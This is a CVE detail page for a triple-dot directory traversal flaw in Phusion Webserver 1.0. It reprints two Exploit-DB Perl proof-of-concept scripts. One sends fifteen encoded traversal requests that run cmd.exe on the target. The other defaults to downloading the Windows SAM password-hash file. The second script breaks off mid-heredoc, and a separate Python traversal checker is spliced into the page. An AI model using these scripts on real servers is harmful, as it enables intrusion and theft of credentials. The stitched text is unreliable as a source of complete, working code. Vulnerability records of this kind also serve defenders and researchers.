CVE-2002-0288 : Detail

CVE-2002-0288

0.81%V3
Network
2002-05-03
02h00 +00:00
2016-10-17
11h57 +00:00

CVE Descriptions

Directory traversal vulnerability in Phusion web server 1.0 allows remote attackers to read arbitrary files via a ... (triple dot dot) in the HTTP request.

CVE Information

Metrics

| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 5 | | AV:N/AC:L/Au:N/C:P/I:N/A:N | [email protected] |

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 21291

Publication date : 2002-02-15 23h00 +00:00
Author : Alex Hernandez
EDB Verified : Yes

source: https://www.securityfocus.com/bid/4117/info

Phusion Webserver is a commercial HTTP server that runs on Microsoft Windows 9x/NT/2000 operating systems. Phusion Webserver is prone to directory traversal attacks. It is possible to break out of wwwroot using triple-dot-slash (.../) sequences containing HTTP-encoded variations of "/" and "\". As a result, a malicious web user may browse web-readable files on the host running the vulnerable software. This vulnerability may potentially result in the disclosure of sensitive information contained in web-readable files on the host. It should be noted that webservers normally run with SYSTEM privileges on Microsoft Windows operating systems.

    #!/usr/bin/perl
    #
    # Simple script to identify if the host is vulnerable!,
    #
    # This does 15 different checks based IIS 4-5. Have Fun!
    #
    # Phusion Webserver v1.0 proof-of-concept exploit
    # By Alex Hernandez <[email protected]> (C)2002.
    #
    # Thanks all the people from Spain and Argentina.
    # Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
    # G.Maggiotti & H.Oliveira.
    #
    #
    # Usage: perl -x Phusion_exp.pl <Hosts>:<Port>
    #
    # Example:
    #
    # perl -x Phusion_exp.pl www.whitehouse.com:80
    # Trying.....................
    #
    # <THIS HOST IS VULNERABLE> :-)
    # Check the previous notes to execute bugs.
    #
    #

    use Socket;

    if ($#ARGV<0) {die " \nPhusion Webserver v1.0 traversal exploit(c)2002.
    Alex Hernandez al3xhernandez\@ureach.com\n Usage: perl -x $0 www.whitehouse.com:80 {OR}\n [if the host is not using a proxy]\n Usage: perl -x $0 127.0.0.1:80\n\n";}

    ($host,$port)=split(/:/,@ARGV[0]);
    print "Trying.....................\n";
    $target = inet_aton($host);
    $flag=0;

    # ---------------test method 1
    my @results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
    foreach $line (@results){
     if ($line =~ /Directory/) {$flag=1;}}

    # ---------------test method 2
    my @results=sendraw("GET /scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
    foreach $line (@results){
     if ($line =~ /Directory/) {$flag=1;}}

    # ---------------test method 3
    my @results=sendraw("GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
    foreach $line (@results){
     if ($line =~ /Directory/) {$flag=1;}}

    # ---------------test method 4
    my @results=sendraw("GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
    foreach $line (@results){
     if ($line =~ /Directory/) {$flag=1;}}

    # ---------------test method 5
    my @results=sendraw("GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
    foreach $line (@results){
     if ($line =~ /Directory/) {$flag=1;}}

    # ---------------test method 6
    my @results=sendraw("GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
    foreach $line (@results){
     if ($line =~ /Directory/) {$flag=1;}}

    # ---------------test method 7
    my @results=sendraw("GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
    foreach $line (@results){
     if ($line =~ /Directory/) {$flag=1;}}

    # ---------------test method 8
    my @results=sendraw("GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
    foreach $line (@results){
     if ($line =~ /Directory/) {$flag=1;}}

    # ---------------test method 9
    my @results=sendraw("GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
    foreach $line (@results){
     if ($line =~ /Directory/) {$flag=1;}}

    # ---------------test method 10
    my @results=sendraw("GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
    foreach $line (@results){
     if ($line =~ /Directory/) {$flag=1;}}

    # ---------------test method 11
    my @results=sendraw("GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
    foreach $line (@results){
     if ($line =~ /Directory/) {$flag=1;}}

    # ---------------test method 12
    my @results=sendraw("GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
    foreach $line (@results){
     if ($line =~ /Directory/) {$flag=1;}}

    # ---------------test method 13
    my @results=sendraw("GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
    foreach $line (@results){
     if ($line =~ /Directory/) {$flag=1;}}

    # ---------------test method 14
    my @results=sendraw("GET /msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../ winnt/system32/cmd.exe\?/c\+dir HTTP/1.0\r\n\r\n");
    foreach $line (@results){
     if ($line =~ /Directory/) {$flag=1;}}

    # ---------------test method 15
    my @results=sendraw("GET /.../.../.../.../winnt/system32/cmd.exe\?/c\+dir HTTP/1.0\r\n\r\n");
    foreach $line (@results){
     if ($line =~ /Directory/) {$flag=1;}}

    #------------------------------
    if ($flag==1){print "<THIS HOST IS VULNERABLE> :-)\n Check the previous notes to execute bugs\n";}
    else {print "<THIS HOST IS NOT VULNERABLE> :-( \n Check manually on browser...\n";}

    sub sendraw {
        my ($pstr)=@_;
        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
        if(connect(S,pack "SnA4x8",2,$port,$target)){
            my @in;
            select(S); $|=1; print $pstr;
            while(<S>){ push @in, $_;}
            select(STDOUT); close(S); return @in;
        } else { die("Can't connect check the port or address...\n"); }
    }

Exploit Database EDB-ID : 21292

Publication date : 2002-02-15 23h00 +00:00
Author : Alex Hernandez
EDB Verified : Yes

source: https://www.securityfocus.com/bid/4117/info

Phusion Webserver is a commercial HTTP server that runs on Microsoft Windows 9x/NT/2000 operating systems. Phusion Webserver is prone to directory traversal attacks. It is possible to break out of wwwroot using triple-dot-slash (.../) sequences containing HTTP-encoded variations of "/" and "\". As a result, a malicious web user may browse web-readable files on the host running the vulnerable software. This vulnerability may potentially result in the disclosure of sensitive information contained in web-readable files on the host. It should be noted that webservers normally run with SYSTEM privileges on Microsoft Windows operating systems.

    #!/usr/bin/perl
    #
    # THIS SCRIPT ONLY FOR WINDOWS WITH PERL OR CYGWIN
    #
    # Simple script to get files on server.
    #
    # Maybe u need this line for windows:
    # #! c:\perl\bin\perl.exe
    #
    # Phusion Webserver v1.0 proof-of-concept exploit.
    # By Alex Hernandez <[email protected]> (C)2002.
    #
    # Thanks all the people from Spain and Argentina.
    # Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
    # G.Maggiotti & H.Oliveira.
    #
    #
    # Usage: perl -x Phusion-GET.pl <And read the Intructions>
    #
    #

    print("\nPhusion Webserver v1.0 GET Files exploit (c)2002.\n");
    print("Alex Hernandez al3xhernandez\@ureach.com\n\n");

    print <<"EOT";
    Please type the address remote webserver, example: www.whitehouse.gov
    [Default remote Webserver is "127.0.0.1"`]:
    EOT

    $host = <>;

    print <<"EOT";
    Please type only in the directory where the file is located you want to download,
    example: /winnt/repair/
    [default directory is "/winnt/repair/"] :#For IIS 4-5
    EOT

    $directory = <> || "/winnt/repair/";

    print <<"EOT";
    Please type in the filename you want download
    example: sam._
    [default file is "sam._"] :
    EOT

    $file = <> || "sam._";

    {
    #Maybe u to change this line depending of PATH installation.
    system("explorer.exe", "http://$host:80/../../..$directory$file");
    }

    print <<"EOT";
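
A server-side check for the request shapes the advisory describes, as an added example (not code from the original page, the exploit author or the Phusion product): it decodes the request target once, rejects malformed or overlong UTF-8 and leftover escapes, and refuses any path segment made only of dots, treating both "/" and "\" as separators. The function names, the reason strings and the strict reject-on-leftover-`%` policy are assumptions of this example, and the sample targets are constructed.

```python
import re
from urllib.parse import unquote_to_bytes


def check_target(target):
    """Return (allowed, detail): a normalized path if allowed, else a reason."""
    path = target.split("?", 1)[0]        # the query string is not part of the path
    raw = unquote_to_bytes(path)          # decode %XX once; malformed escapes stay literal
    try:
        text = raw.decode("utf-8")        # strict decode rejects overlong forms such as C0 AF
    except UnicodeDecodeError:
        return False, "invalid-utf8"
    if "%" in text:                       # malformed or double-encoded escape survived
        return False, "residual-escape"
    # Split on both separators, as a Windows file system would.
    segments = [s for s in re.split(r"[/\\]", text) if s not in ("", ".")]
    for seg in segments:
        if set(seg) <= {".", " "}:        # "..", "...", ".. " and longer runs
            return False, "dot-only-segment"
    return True, "/" + "/".join(segments)


# Constructed request targets; the rejected ones follow patterns quoted on this page.
SAMPLES = [
    "/index.html",
    "/a/./b//c.txt",
    "/caf%C3%A9.html",
    "/.../.../.../.../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir",
    "/a/..%5c..%5cb.txt",
    "/a/%252e%252e/b.txt",
]


def triage(targets):
    """Map each request target to its (allowed, detail) verdict."""
    return {t: check_target(t) for t in targets}


if __name__ == "__main__":
    for target, (ok, detail) in triage(SAMPLES).items():
        print("ALLOW " if ok else "REJECT", detail.ljust(18), target)
```

The same function can sit in front of file lookup as a gate or run over access-log request lines to flag probes of this kind.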

Products Mentioned

Configuration 0

Bbshareware.com >> Phusion_webserver >> Version 1.0

References

http://www.securityfocus.com/bid/4117
Tags : vdb-entry, x_refsource_BID

http://marc.info/?l=bugtraq&m=101408906001958&w=2
Tags : mailing-list, x_refsource_BUGTRAQ